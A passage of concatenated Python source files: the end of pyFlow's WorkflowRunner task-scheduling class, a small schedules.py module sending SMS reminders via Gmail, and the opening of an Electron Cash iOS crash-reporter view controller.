lister(getExceptionMsg()) msg.extend(eMsg) self._notify(msg,logState=LogState.ERROR) try: self.runStartTimeStamp = time.time() self.updateInterval = int(updateInterval) # a container to haul all the run() options around in: param = Bunch(mode=mode, dataDir=dataDirRoot, isContinue=isContinue, isForceContinue=isForceContinue, nCores=nCores, memMb=memMb, isDryRun=isDryRun, retryMax=retryMax, retryWait=retryWait, retryWindow=retryWindow, retryMode=retryMode, mailTo=mailTo, logRunStartTime=timeStampToTimeStr(self.runStartTimeStamp), workflowClassName=self._whoami(), schedulerArgList=schedulerArgList, isQuiet=isQuiet, warningLogFile=warningLogFile, errorLogFile=errorLogFile, successMsg=successMsg, startFromTasks=setzer(startFromTasks), ignoreTasksAfter=setzer(ignoreTasksAfter), resetTasks=setzer(resetTasks)) retval = self._runWorkflow(param) except SigTermException: msg = "Received termination signal, shutting down running tasks..." self._killWorkflow(msg) except KeyboardInterrupt: msg = "Keyboard Interrupt, shutting down running tasks..." self._killWorkflow(msg) except DataDirException as e: # Special exception for when pyflow directory can't be initialized. # A killWorkflow is not needed for this case, because no workflow # could be started. self._notify(e.msg,logState=LogState.ERROR) except: # For unhandled/unknown exceptions, catch here to write some supplemental # data (thread name, etc.) before releasing the exception down the stack exceptionMessaging() raise finally: # last set: disconnect the workflow log: self._cdata().resetRun() unset_pyflow_sig_handlers() return retval # configurable elements of docstring run.__doc__ = run.__doc__ % (siteConfig.maxSGEJobs, RunMode.data["sge"].defaultCores, siteConfig.defaultHostMemMbPerCore, siteConfig.mailFrom) # protected methods which can be called within the workflow method: def addTask(self, label, command=None, cwd=None, env=None, nCores=1, memMb=siteConfig.defaultTaskMemMb, dependencies=None, priority=0, isForceLocal=False, isCommandMakePath=False, isTaskStable=True, mutex=None, retryMax=None, retryWait=None, retryWindow=None, retryMode=None) : """ Add task to workflow, including resource requirements and specification of dependencies. Dependency tasks must already exist in the workflow. @return: The 'label' argument is returned without modification. @param label: A string used to identify each task. The label must be composed of only ascii letters, digits, underscores and dashes (ie. /[A-Za-z0-9_-]+/). The label must also be unique within the workflow, and non-empty. @param command: The task command. Commands can be: (1) a shell string (2) an iterable container of strings (argument list) (3) None. In all cases strings must not contain newline characters. A single string is typically used for commands that require shell features (such as pipes), an argument list can be used for any other commands, this is often a useful way to simplify quoting issues or to submit extremely long commands. The default command (None), can be used to create a 'checkpoint', ie. a task which does not run anything, but provides a label associated with the completion of a set of dependencies. @param cwd: Specify current working directory to use for command execution. Note that if submitting the command as an argument list (as opposed to a shell string) the executable (arg[0]) is searched for before changing the working directory, so you cannot specify the executable relative to the cwd setting. If submitting a shell string command this restriction does not apply. @param env: A map of environment variables for this task, for example 'env={"PATH": "/usr/bin"}'. When env is set to None (the default) the environment of the pyflow client process is used. @param nCores: Number of cpu threads required @param memMb: Amount of memory required (in megabytes) @param dependencies: A task label or container of task labels specifying all dependent tasks. Dependent tasks must already exist in the workflow. @type dependencies: A single string, or set, tuple or list of strings @param priority: Among all tasks which are eligible to run at the same time, launch tasks with higher priority first. this value can be set from[-100,100]. Note that this will strongly control the order of task launch on a local run, but will only control task submission order to a secondary scheduler (like sge). All jobs with the same priority are already submitted in order from highest to lowest nCores requested, so there is no need to set priorities to replicate this behavior. The taskManager can start executing tasks as soon as each addTask() method is called, so lower-priority tasks may be launched first if they are specified first in the workflow. @param isForceLocal: Force this task to run locally when a distributed task mode is used. This can be used to launch very small jobs outside of the sge queue. Note that 'isForceLocal' jobs launched during a non-local task mode are not subject to resource management, so it is important that these represent small jobs. Tasks which delete, move or touch a small number of files are ideal for this setting. @param isCommandMakePath: If true, command is assumed to be a path containing a makefile. It will be run using make/qmake according to the run's mode and the task's isForceLocal setting @param isTaskStable: If false, indicates that the task command and/or dependencies may change if the run is interrupted and restarted. A command marked as unstable will not be checked to make sure it matches its previous definition during run continuation. Unstable examples: command contains a date/time, or lists a set of files which are deleted at some point in the workflow, etc. @param mutex: Provide an optional id associated with a pyflow task mutex. For all tasks with the same mutex id, no more than one will be run at once. Id name must follow task id restrictions. Mutex ids are global across all recursively invoked workflows. Example use case: This feature has been added as a simpler alternative to file locking, to ensure sequential, but not ordered, access to a file. @param retryMax: The number of times this task will be retried after failing. If defined, this overrides the workflow retryMax value. @param retryWait: The number of seconds to wait before relaunching a failed task. If defined, this overrides the workflow retryWait value. @param retryWindow: The number of seconds after job submission in which retries will be attempted for non-make jobs. A value of zero or less causes retries to be attempted anytime after job submission. If defined, this overrides the workflow retryWindow value. @param retryMode: Modes are 'nonlocal' and 'all'. For 'nonlocal' retries are not attempted in local run mode. For 'all' retries are attempted for any run mode. If defined, this overrides the workflow retryMode value. """ self._requireInWorkflow() #### Canceled plans to add deferred dependencies: # # deferredDependencies -- A container of labels specifying dependent # # tasks which have not yet been added to the # # workflow. In this case the added task will # # wait for the dependency to be defined *and* # # complete. Avoid these in favor or regular # # dependencies if possible. # sanitize bools: isForceLocal = argToBool(isForceLocal) isCommandMakePath = argToBool(isCommandMakePath) # sanitize ints: nCores = int(nCores) memMb = int(memMb) priority = int(priority) if (priority > 100) or (priority < -100) : raise Exception("priority must be an integer in the range [-100,100]") # sanity check label: WorkflowRunner._checkTaskLabel(label) fullLabel = namespaceJoin(self._getNamespace(), label) # verify/sanitize command: cmd = Command(command, cwd, env) # deal with command/resource relationship: if cmd.cmd is None : nCores = 0 memMb = 0 else: if nCores <= 0 : raise Exception("Unexpected core requirement for task: '%s' nCores: %i" % (fullLabel, nCores)) if memMb <= 0: raise Exception("Unexpected memory requirement for task: '%s' memory: %i (megabytes)" % (fullLabel, memMb)) if (self._cdata().param.nCores != "unlimited") and (nCores > self._cdata().param.nCores) : raise Exception("Task core requirement exceeds full available resources") if (self._cdata().param.memMb != "unlimited") and (memMb > self._cdata().param.memMb) : raise Exception("Task memory requirement exceeds full available resources") # check that make path commands point to a directory: # if isCommandMakePath : if cmd.type != "str" : raise Exception("isCommandMakePath is set, but no path is provided in task: '%s'" % (fullLabel)) cmd.cmd = os.path.abspath(cmd.cmd) # sanitize mutex option if mutex is not None : WorkflowRunner._checkTaskLabel(mutex) task_retry = self._cdata().param.retry.getTaskCopy(retryMax, retryWait, retryWindow, retryMode) # private _addTaskCore gets hijacked in recursive workflow submission: # payload = CmdPayload(fullLabel, cmd, nCores, memMb, priority, isForceLocal, isCommandMakePath, isTaskStable, mutex, task_retry) self._addTaskCore(self._getNamespace(), label, payload, dependencies) return label def addWorkflowTask(self, label, workflowRunnerInstance, dependencies=None, isEphemeral=False) : """ Add another WorkflowRunner instance as a task to this workflow. The added Workflow's workflow() method will be called once the dependencies specified in this call have completed. Once started, all of the submitted workflow's method calls (like addTask) will be placed into the enclosing workflow instance and bound by the run parameters of the enclosing workflow. This task will be marked complete once the submitted workflow's workflow() method has finished, and any tasks it initiated have completed. Note that all workflow tasks will have their own tasks namespaced with the workflow task label. This namespace is recursive in the case that you add workflow tasks which add their own workflow tasks, etc. Note that the submitted workflow instance will be deep copied before being altered in any way. @return: The 'label' argument is returned without modification. @param label: A string used to identify each task. The label must be composed of only ascii letters, digits, underscores and dashes (ie. /[A-Za-z0-9_-]+/). The label must also be unique within the workflow, and non-empty. @param workflowRunnerInstance: A L{WorkflowRunner} instance. @param dependencies: A label string or container of labels specifying all dependent tasks. Dependent tasks must already exist in the workflow. @type dependencies: A single string, or set, tuple or list of strings @param isEphemeral: If true, the workflow will be rerun under certain conditions when an interrupt/resume cycle occurs, even if it already successfully completed. This will only occur if (1) no downstream dependencies have already completed and (2) the parent workflow is not complete. (default: False) """ self._requireInWorkflow() # sanity check label: WorkflowRunner._checkTaskLabel(label) import inspect # copy and 'hijack' the workflow: workflowCopy = copy.deepcopy(workflowRunnerInstance) # hijack! -- take all public methods at the WorkflowRunner level # (except workflow()), and insert the self copy: publicExclude = ["workflow", "addTask", "addWorkflowTask", "waitForTasks", "isTaskComplete", "isTaskDone", "cancelTaskTree"] for (n, _v) in inspect.getmembers(WorkflowRunner, predicate=inspect.ismethod) : if n[0] == "_" : continue # skip private/special methods if n in publicExclude : continue setattr(workflowCopy, n, getattr(self, n)) privateInclude = ["_cdata", "_addTaskCore", "_waitForTasksCore", "_isTaskCompleteCore","_setRunning", "_getRunning", "_cancelTaskTreeCore"] for n in privateInclude : setattr(workflowCopy, n, getattr(self, n)) # final step: disable the run() function to be extra safe... workflowCopy.run = None # set the task namespace: workflowCopy._appendNamespace(self._getNamespaceList()) workflowCopy._appendNamespace(label) # add workflow task to the task-dag, and launch a new taskrunner thread # if one isn't already running: payload = WorkflowPayload(workflowCopy, isTaskEphemeral=isEphemeral) self._addTaskCore(self._getNamespace(), label, payload, dependencies) return label def waitForTasks(self, labels=None) : """ Wait for a list of tasks to complete. @return: In case of an error in a task being waited for, or in one of these task's dependencies, the function returns 1. Else return 0. @param labels: Container of task labels to wait for. If an empty container is given or no list is provided then wait for all outstanding tasks to complete. @type labels: A single string, or set, tuple or list of strings """ self._requireInWorkflow() return self._waitForTasksCore(self._getNamespace(), labels) def isTaskComplete(self, taskLabel) : """ Query if a specific task is in the workflow and completed without error. This can assist workflows with providing stable interrupt/resume behavior. @param taskLabel: A task string @return: Completion status of task """ result = self._isTaskCompleteCore(self._getNamespace(), taskLabel) # Complete = (Done and not Error) return (result[0] and not result[1]) def isTaskDone(self, taskLabel) : """ Query if a specific task is in the workflow and is done, with or without error This can assist workflows with providing stable interrupt/resume behavior. @param taskLabel: A task string @return: A boolean tuple specifying (task is done, task finished with error) """ return self._isTaskCompleteCore(self._getNamespace(), taskLabel) def cancelTaskTree(self, taskLabel) : """ Cancel the given task and all of its dependencies. A canceled task will not be stopped if it is already running (this is planned for the future), but will be unqueued if it is waiting, and put into the waiting/ignored state unless it has already completed. Canceled tasks will not be treated as errors. """ self._cancelTaskTreeCore(self._getNamespace(), taskLabel) def getRunMode(self) : """ Get the current run mode This can be used to access the current run mode from within the workflow function. Although the runmode should be transparent to client code, this is occasionally needed to hack workarounds. @return: Current run mode """ self._requireInWorkflow() return self._cdata().param.mode def getNCores(self) : """ Get the current run core limit This function can be used to access the current run's core limit from within the workflow function. This can be useful to eg. limit the number of cores requested by a single task. @return: Total cores available to this workflow run @rtype: Integer value or 'unlimited' """ self._requireInWorkflow() return self._cdata().param.nCores def limitNCores(self, nCores) : """ Takes an task nCores argument and reduces it to the maximum value allowed for the current run. @param nCores: Proposed core requirement @return: Min(nCores,Total cores available to this workflow run) """ self._requireInWorkflow() nCores = int(nCores) runNCores = self._cdata().param.nCores if runNCores == "unlimited" : return nCores return min(nCores, runNCores) def getMemMb(self) : """ Get the current run's total memory limit (in megabytes) @return: Memory limit in megabytes @rtype: Integer value or 'unlimited' """ self._requireInWorkflow() return self._cdata().param.memMb def limitMemMb(self, memMb) : """ Takes a task memMb argument and reduces it to the maximum value allowed for the current run. @param memMb: Proposed task memory requirement in megabytes @return: Min(memMb,Total memory available to this workflow run) """ self._requireInWorkflow() memMb = int(memMb) runMemMb = self._cdata().param.memMb if runMemMb == "unlimited" : return memMb return min(memMb, runMemMb) def isDryRun(self) : """ Get isDryRun flag value. When the dryrun flag is set, no commands are actually run. Querying this flag allows dynamic workflows to correct for dry run behaviors, such as tasks which do no produce expected files. @return: DryRun status flag """ self._requireInWorkflow() return self._cdata().param.isDryRun def isWorkflowStopping(self) : """ Return true if the workflow is in the process of stopping Usually the workflow is stopped due to a task error. The goal of this behavior is to allow currently running tasks to complete but not launch any new tasks. It is not essential that a workflow check this method and respond by stopping workflow execution unless it implements some type of potentially infinite loop dependent on task outcome. """ return (not self._cdata().isTaskSubmissionActive()) @staticmethod def runModeDefaultCores(mode) : """ Get the default core limit for run mode (local,sge,..) @param mode: run mode, as specified in L{the run() method<WorkflowRunner.run>} @return: Default maximum number of cores for mode @rtype: Either 'unlimited', or a string representation of the integer limit """ return str(RunMode.data[mode].defaultCores) def flowLog(self, msg, logState = LogState.INFO) : """ Send a message to the WorkflowRunner's log. @param msg: Log message @type msg: A string or an array of strings. String arrays will be separated by newlines in the log. @param logState: Message severity, defaults to INFO. @type logState: A value in pyflow.LogState.{INFO,WARNING,ERROR} """ self._requireInWorkflow() linePrefixOut = "[%s]" % (self._cdata().param.workflowClassName) self._cdata().flowLog(msg, linePrefix=linePrefixOut, logState=logState) # Protected methods for client derived-class override: def workflow(self) : """ Workflow definition defined in child class This method should be overridden in the class derived from L{WorkflowRunner} to specify the actual workflow logic. Client code should not call this method directly. """ pass # private methods: # special workflowRunner Exception used to terminate workflow() function # if a ctrl-c is issued class _AbortWorkflowException(Exception) : pass def _flowLog(self, msg, logState) : linePrefixOut = "[WorkflowRunner]" self._cdata().flowLog(msg, linePrefix=linePrefixOut, logState=logState) def _infoLog(self, msg) : self._flowLog(msg,logState=LogState.INFO) def _warningLog(self, msg) : self._flowLog(msg,logState=LogState.WARNING) def _errorLog(self, msg) : self._flowLog(msg,logState=LogState.ERROR) def _whoami(self) : # returns name of *derived* class return self.__class__.__name__ def _getNamespaceList(self) : try: return self._namespaceList except AttributeError: self._namespaceList = [] return self._namespaceList def _getNamespace(self) : return namespaceSep.join(self._getNamespaceList()) def _appendNamespace(self, names) : names = lister(names) for name in names : # check against runaway recursion: if len(self._getNamespaceList()) >= WorkflowRunner._maxWorkflowRecursion : raise Exception("Recursive workflow invocation depth exceeds maximum allowed depth of %i" % (WorkflowRunner._maxWorkflowRecursion)) WorkflowRunner._checkTaskLabel(name) self._getNamespaceList().append(name) # flag used to request the termination of all task submission: # _allStop = threading.Event() @staticmethod def _stopAllWorkflows() : # request all workflows stop task submission: WorkflowRunner._allStop.set() @staticmethod def _isWorkflowStopped() : # check whether a global signal has been give to stop all workflow submission # this should only be true when a ctrl-C or similar event has occurred. return WorkflowRunner._allStop.isSet() def _addTaskCore(self, namespace, label, payload, dependencies) : # private core addTask routine for hijacking # fromWorkflow is the workflow instance used to launch the task # # add workflow task to the task-dag, and launch a new taskrunner thread # if one isn't already running: if self._isWorkflowStopped() : raise WorkflowRunner._AbortWorkflowException self._infoLog("Adding %s '%s' to %s" % (payload.desc(), namespaceJoin(namespace, label), namespaceLabel(namespace))) # add task to the task-dag, and launch a new taskrunner thread # if one isn't already running: dependencies = setzer(dependencies) self._tdag.addTask(namespace, label, payload, dependencies) self._startTaskManager() def _getWaitStatus(self, namespace, labels, status) : # update and return two values: # (1) isAllTaskDone -- are all tasks done (ie. error or complete state # (2) retval -- this is set to one if any tasks have errors # def updateStatusFromTask(task, status) : if not task.isDone() : status.isAllTaskDone = False elif not task.isComplete() : status.retval = 1 if status.retval == 0 and (not self._cdata().isTaskSubmissionActive()) : status.retval = 1 if status.retval == 0 and task.isDead() : status.retval = 1 if len(labels) == 0 : if namespace == "" : if self._tdag.isRunExhausted() or (not self._tman.is_alive()) : if not self._tdag.isRunComplete() : status.retval = 1 else: status.isAllTaskDone = False else : for task in self._tdag.getAllNodes(namespace) : updateStatusFromTask(task, status) else : for l in labels : if not self._tdag.isTaskPresent(namespace, l) : raise Exception("Task: '%s' is not in taskDAG" % (namespaceJoin(namespace, l))) task = self._tdag.getTask(namespace, l) updateStatusFromTask(task, status) def _waitForTasksCore(self, namespace, labels=None, isVerbose=True) : labels = setzer(labels) if isVerbose : msg = "Pausing %s until completion of" % (namespaceLabel(namespace)) if len(labels) == 0 : self._infoLog(msg + " its current tasks") else: self._infoLog(msg + " task(s): %s" % (",".join([namespaceJoin(namespace, l) for l in labels]))) class WaitStatus: def __init__(self) : self.isAllTaskDone = True self.retval = 0 ewaiter = ExpWaiter(1, 1.7, 15) while True : if self._isWorkflowStopped() : raise WorkflowRunner._AbortWorkflowException status = WaitStatus() self._getWaitStatus(namespace, labels, status) if status.isAllTaskDone or (status.retval != 0) : break ewaiter.wait() if isVerbose : msg = "Resuming %s" % (namespaceLabel(namespace)) self._infoLog(msg) return status.retval def _isTaskCompleteCore(self, namespace, taskLabel) : """ @return: A boolean tuple specifying (task is done, task finished with error) """ if not self._tdag.isTaskPresent(namespace, taskLabel) : return (False, False) # Run a task harvest just before checking the task status # to help ensure the status is up to date self._tman.harvestTasks() task = self._tdag.getTask(namespace, taskLabel) return ( task.isDone(), task.isError() ) def _cancelTaskTreeCore(self, namespace, taskLabel) : if not self._tdag.isTaskPresent(namespace, taskLabel) : return task = self._tdag.getTask(namespace, taskLabel) self._tman.cancelTaskTree(task) @staticmethod def _checkTaskLabel(label) : # sanity check label: if not isinstance(label, str) : raise Exception ("Task label is not a string") if label == "" : raise Exception ("Task label is empty") if not re.match("^[A-Za-z0-9_-]+$", label) : raise Exception ("Task label is invalid due to disallowed characters. Label: '%s'" % (label)) def _startTaskManager(self) : # Start a new task manager if one isn't already running. If it is running # provide a hint that a new task has just been added to the workflow. # if (self._tman is not None) and (self._tman.is_alive()) : self._tdag.isFinishedEvent.set() return if not self._cdata().isTaskManagerException : self._tman = TaskManager(self._cdata(), self._tdag) self._tman.start() def _notify(self, msg, logState) : # msg is printed to log AND sent to any email or other requested # notification systems: self._flowLog(msg,logState) self._cdata().emailNotification(msg, self._flowLog) def _flushFileWriters(self) : """ Some file updates are buffered on separate threads to improve workflow performance. Thus function provides a central point to request that all such buffers are flushed. """ self._taskInfoWriter.flush() self._taskStatusWriter.flush() def _killWorkflow(self, errorMsg) : self._notify(errorMsg,logState=LogState.ERROR) self._flushFileWriters() self._shutdownAll(timeoutSec=10) sys.exit(1) def _shutdownAll(self, timeoutSec) : # Try to shut down the task manager, all command-tasks, # and all sub-workflow tasks. # if (self._tman is None) or (not self._tman.is_alive()) : return StoppableThread.stopAll() self._stopAllWorkflows() self._tman.stop() for _ in range(timeoutSec) : time.sleep(1) if not self._tman.is_alive() : self._infoLog("Task shutdown complete") return self._infoLog("Task shutdown timed out") def _cdata(self) : # We're doing this convoluted setup only to avoid having a # ctor for ease of use by the client. See what pyFlow goes # through for you client code?? # try: return self._constantData except AttributeError: self._constantData = WorkflowRunnerThreadSharedData() return self._constantData # TODO: Better definition of the status thread shutdown at the end of a pyflow run to # prevent race conditions -- ie. what happens if the status update is running while # pyflow is shutting down? Every method called by the status updater should be safety # checked wrt this issue. # def _runUpdate(self, runStatus) : while True : time.sleep(self.updateInterval * 60) status = self._tdag.getTaskStatus() isSpecComplete = (runStatus.isSpecificationComplete.isSet() and status.isAllSpecComplete) report = [] report.append("===== " + self._whoami() + " StatusUpdate =====") report.append("Workflow specification is complete?: %s" % (str(isSpecComplete))) report.append("Task status (waiting/queued/running/complete/error): %i/%i/%i/%i/%i" % (status.waiting, status.queued, status.running, status.complete, status.error)) report.append("Longest ongoing queued task time (hrs): %.4f" % (status.longestQueueSec / 3600.)) report.append("Longest ongoing queued task name: '%s'" % (status.longestQueueName)) report.append("Longest ongoing running task time (hrs): %.4f" % (status.longestRunSec / 3600.)) report.append("Longest ongoing running task name: '%s'" % (status.longestRunName)) report = [ "[StatusUpdate] " + line for line in report ] self._infoLog(report) # Update interval is also an appropriate interval to dump a stack-trace of all active # threads. This is a useful post-mortem in the event of a large class of hang/deadlock # errors: # stackDumpFp = open(self._cdata().stackDumpLogFile, "a") # create one fully decorated line in the stack dump file as a prefix to the report: linePrefixOut = "[%s] [StackDump]" % (self._cdata().getRunid()) ofpList = [stackDumpFp] log(ofpList, "Initiating stack dump for all threads", linePrefixOut) stackDump(stackDumpFp) hardFlush(stackDumpFp) stackDumpFp.close() def _runWorkflow(self, param) : # # Primary workflow logic when nothing goes wrong: # self._setupWorkflow(param) self._initMessage() runStatus = RunningTaskStatus(self._tdag.isFinishedEvent) # start status update reporter: # # TODO: stop this thread at end of run # if(self.updateInterval > 0) : hb = threading.Thread(target=WorkflowRunner._runUpdate, args=(self, runStatus)) hb.setDaemon(True) hb.setName("StatusUpdate-Thread") hb.start() # run workflow() function on a separate thread, using exactly # the same method we use for sub-workflows: # # TODO: move the master workflow further into the code path used by sub-workflows, # so that we aren't replicating polling and error handling code in this function: # trun = WorkflowTaskRunner(runStatus, "masterWorkflow", self, self._cdata().flowLog, None) trun.start() # can't join() because that blocks SIGINT ewaiter = ExpWaiter(1, 1.7, 15,runStatus.isComplete) def isWorkflowRunning() : """ Return true so long as the primary workflow threads (TaskRunner and TaskManager) are still alive """ return trun.is_alive() or ((self._tman is not None) and self._tman.is_alive()) while isWorkflowRunning() : ewaiter.wait() if not runStatus.isComplete.isSet() : # if not complete then we don't know what happened, very bad!: runStatus.errorCode = 1 runStatus.errorMessage = "Thread: '%s', has stopped without a traceable cause" % (trun.getName()) self._flushFileWriters() return self._evalWorkflow(runStatus) def _setupWorkflow(self, param) : cdata = self._cdata() # setup instance user parameters: cdata.setupNewRun(param) # setup other instance data: self._tdag = TaskDAG(cdata.param.isContinue, cdata.param.isForceContinue, cdata.param.isDryRun, cdata.taskInfoFile, cdata.taskStateFile, cdata.param.workflowClassName, cdata.param.startFromTasks, cdata.param.ignoreTasksAfter, cdata.param.resetTasks, self._flowLog) self._tman = None def backupFile(inputFile) : """ backup old state files if they exist """ if not os.path.isfile(inputFile) : return fileDir = os.path.dirname(inputFile) fileName = os.path.basename(inputFile) backupDir = os.path.join(fileDir, "backup") ensureDir(backupDir) backupFileName = fileName + ".backup_before_starting_run_%s.txt" % (cdata.getRunid()) backupFile = os.path.join(backupDir, backupFileName) shutil.copyfile(inputFile, backupFile) backupFile(cdata.taskStateFile) backupFile(cdata.taskInfoFile) self._taskInfoWriter = TaskFileWriter(self._tdag.writeTaskInfo) self._taskStatusWriter = TaskFileWriter(self._tdag.writeTaskStatus) self._tdag.isWriteTaskInfo = self._taskInfoWriter.isWrite self._tdag.isWriteTaskStatus = self._taskStatusWriter.isWrite self._taskInfoWriter.start() self._taskStatusWriter.start() if cdata.param.isContinue : # Make workflow changes required when resuming after an interrupt, where the client has requested the # workflow continue from where it left off (ie. 'isContinued') self._tdag.setupContinuedWorkflow() def _initMessage(self) : param = self._cdata().param # shortcut msg = ["Initiating pyFlow run"] msg.append("pyFlowClientWorkflowClass: %s" % (param.workflowClassName)) msg.append("pyFlowVersion: %s" % (__version__)) msg.append("pythonVersion: %s" % (pythonVersion)) msg.append("WorkingDir: '%s'" % (self._cdata().cwd)) msg.append("ProcessCmdLine: '%s'" % (cmdline())) parammsg = ["mode: %s" % (param.mode), "nCores: %s" % (str(param.nCores)), "memMb: %s" % (str(param.memMb)), "dataDir: %s" % (str(param.dataDir)), "isDryRun: %s" % (str(param.isDryRun)), "isContinue: %s" % (str(param.isContinue)), "isForceContinue: %s" % (str(param.isForceContinue)), "mailTo: '%s'" % (",".join(param.mailTo))] for i in range(len(parammsg)): parammsg[i] = "[RunParameters] " + parammsg[i] msg += parammsg self._infoLog(msg) def _getTaskErrorsSummaryMsg(self, isForceTaskHarvest=False) : # isForceHarvest means we try to force an update of the shared # taskError information in case this thread is ahead of the # task manager. if isForceTaskHarvest : if (self._tman is not None) and (self._tman.is_alive()) : self._tman.harvestTasks() if not self._cdata().isTaskError() : return [] # this case has already been emailed in the TaskManager @ first error occurrence: msg = ["Worklow terminated due to the following task errors:"] for task in self._cdata().taskErrors : msg.extend(task.getTaskErrorMsg()) return msg def _evalWorkflow(self, masterRunStatus) : isError = False if self._cdata().isTaskError() : msg = self._getTaskErrorsSummaryMsg() self._errorLog(msg) isError = True if masterRunStatus.errorCode != 0 : eMsg = lister(masterRunStatus.errorMessage) if (len(eMsg) > 1) or (len(eMsg) == 1 and eMsg[0] != "") : msg = ["Failed to complete master workflow, error code: %s" % (str(masterRunStatus.errorCode))] msg.append("errorMessage:") msg.extend(eMsg) self._notify(msg,logState=LogState.ERROR) isError = True if self._cdata().isTaskManagerException : # this case has already been emailed in the TaskManager: self._errorLog("Workflow terminated due to unhandled exception in TaskManager") isError = True if (not isError) and (not self._tdag.isRunComplete()) : msg = "Workflow terminated with unknown error condition" self._notify(msg,logState=LogState.ERROR) isError = True if isError: return 1 elapsed = int(time.time() - self.runStartTimeStamp) msg = [] if self._cdata().param.successMsg is not None : msg.extend([self._cdata().param.successMsg,""]) msg.extend(["Workflow successfully completed all tasks", "Elapsed time for full workflow: %s sec" % (elapsed)]) self._notify(msg,logState=LogState.INFO) return 0 def _requireInWorkflow(self) : """ check that the calling method is being called as part of a pyflow workflow() method only """ if not self._getRunning(): raise Exception("Method must be a (call stack) descendant of WorkflowRunner workflow() method (via run() method)") def _initRunning(self): try : assert(self._isRunning >= 0) except AttributeError : self._isRunning = 0 @lockMethod def _setRunning(self, isRunning) : self._initRunning() if isRunning : self._isRunning += 1 else : self._isRunning -= 1 @lockMethod def _getRunning(self) : self._initRunning() return (self._isRunning > 0) if __name__ == "__main__" : help(WorkflowRunner)
schedules.py
"""schedules: schedules all scheduled tasks, maintenace and time based requests Provides a variety of classes to hold scheduled taks, update them and answer queries about them. Copyright (c) 2020 by Jeff Bass. License: MIT, see LICENSE for more details. """ import sys import pprint import logging import schedule import threading import subprocess from time import sleep from pathlib import Path from datetime import datetime from collections import deque from helpers.comms.gmail import Gmail from helpers.utils import YamlOptionsError log = logging.getLogger(__name__) class Schedule: """ Methods and attributes to manage schedules. Provides a variety of classes to hold scheduled taks, update them and answer queries about them. Parameters: settings (Settings object): settings object created from YAML file """ def __init__(self, settings, gmail): # get schedules dictionary from yaml file schedules = settings.schedules self.gmail = gmail if schedules: # at least one schedled item in yaml schedule_types = self.load_schedule_data(schedules) # e.g., reminders s = self.setup_schedule(schedule_types) self.schedule_run(s) # run a thread that runs scheduled tasks def load_schedule_data(self, schedules): """ load schedule data from yaml file dictionary Parameters schedules (dict): schedule items in yaml file Returns: schedule_options (list): list of all the requested schedule items """ schedule_types = [] valid_schedule_types = ['backups', 'reminders'] for s_type in valid_schedule_types: sched = schedules.get(s_type, {}) if sched: # not empty schedule_types.append(sched) # print('schedule_types', *schedule_types) return schedule_types def setup_schedule(self, schedule_types): """ load schedule data from yaml file dictionary Parameters: schedule_types (list): schedule items in yaml file """ for event_type in schedule_types: # e.g., reminders, backups, etc. for _, event_specs in event_type.items(): # events are nested dictionaries from yaml if 'message' in event_specs: # this event action is 'send message' # days = event_specs.get('days', 'all') # maybe in future? times = event_specs.get('times', []) # times is a list of times in strings, like '10:30' # print('list of times', *times) message = event_specs.get('message', '') # print('message:', message) channel = event_specs.get('channel', '') # print('channel:', channel) phone = event_specs.get('phone', '') # print('phone:', phone) func = self.send_sms args = (phone, message) for t in times: schedule.every().day.at(t).do(self.send_sms, phone, message) # print('A: Number of timed jobs:', len(schedule.jobs)) return schedule def send_sms(self, phone, message): """ send an SMS message Sends an SMS message using the Gmail SMS interface. Parameters phone (str): phone number to send SMS message to message (str): message to send via SMS """ # print('Sent:', message, 'To:', phone, ' -- at', datetime.now().isoformat()) self.gmail.gmail_send_SMS(phone, message) def run_backups(self, source, destination): # a possible setup of the backup section of schedules is in example3.yaml pass def schedule_run(self, schedule): """ run all scheduled jobs that have been setup in schedule Parameters: schedule (schedule object): contains all scheduled jobs """ if len(schedule.jobs): # no need to start thread if no jobs in queue t = threading.Thread(target=self.scheduler_thread) # print('Starting scheduler thread') t.daemon = True # allows this thread to be auto-killed on program exit t.name = 'Scheduler Thread' # naming the thread helps with debugging t.start() def scheduler_thread(self): while True: schedule.run_pending() sleep(1)
crashreporter.py
# # This file is: # Copyright (C) 2018 Calin Culianu <calin.culianu@gmail.com> # # MIT License from . import utils from . import gui from electroncash.i18n import _ from .uikit_bindings import * from .custom_objc import * import json, traceback, requests, sys from electroncash import PACKAGE_VERSION issue_template = """<font face=arial color="#414141"> <h2>Traceback</h2> <pre> {traceback} </pre> <h2>Additional information</h2> <ul> <li>Electron Cash version: {app_version}</li> <li>Python version: {python_version}</li> <li>Operating system: {os}</li> <li>Wallet type: {wallet_type}</li> <li>Locale: {locale}</li> </ul> </font> """ #BauerJ's testing server #report_server = "https://crashhubtest.bauerj.eu/crash" # "Live" (Marcel's server) report_server = "https://crashhub.devault.cc/crash" Singleton = None class CrashReporterVC(CrashReporterBase): @objc_method def dealloc(self) -> None: global Singleton Singleton = None utils.nspy_pop(self) send_super(__class__, self, 'dealloc') @objc_method def viewDidLoad(self) -> None: send_super(__class__, self, 'viewDidLoad') global Singleton Singleton = self self.report.text = "" self.reportTit.setText_withKerning_(_("Report Contents"), utils._kern) self.descTit.setText_withKerning_(_("Please briefly describe what led to the error (optional):").translate({ord(':'):None}), utils._kern) utils.uilabel_replace_attributed_text(self.errMsg, _('Sorry!') + " " + _('Something went wrong running DeLight.') + " " + _('To help us diagnose and fix the problem, you can send us a bug report that contains useful debug information:').translate({ord(':'):None}), font = UIFont.italicSystemFontOfSize_(12.0) ) self.descDel.placeholderFont = UIFont.italicSystemFontOfSize_(14.0) self.descDel.font = UIFont.systemFontOfSize_(14.0) self.descDel.placeholderText = _('Tap to enter text...') self.descDel.text = "" self.title = _('Crash Reporter') @objc_method def viewWillAppear_(self, animated : bool) -> None: send_super(__class__, self, 'viewWillAppear:', animated, argtypes=[c_bool]) self.kbas = utils.register_keyboard_autoscroll(self.sv) # Below will be enabled if we have valid exception info self.sendBut.setEnabled_(False) utils.uiview_set_enabled(self.sendBut, False) @objc_method def viewWillDisappear_(self, animated : bool) -> None: send_super(__class__, self, 'viewWillDisappear:', animated, argtypes=[c_bool]) if self.kbas: utils.unregister_keyboard_autoscroll(self.kbas) self.kbas = 0 @objc_method def viewDidAppear_(self, animated : bool) -> None: send_super(__class__, self, 'viewDidAppear:', animated, argtypes=[c_bool]) ei = _Get(self) if ei: self.report.attributedText = utils.nsattributedstring_from_html(_get_report_string(self)) self.sendBut.setEnabled_(True) utils.uiview_set_enabled(self.sendBut, True) @objc_method def onSendBut_(self, sender) -> None: def SendReport() -> str: reportDict = _get_traceback_info(self) reportDict.update(_get_additional_info(self)) report = json.dumps(reportDict) #reportPretty = json.dumps(reportDict, indent=4) 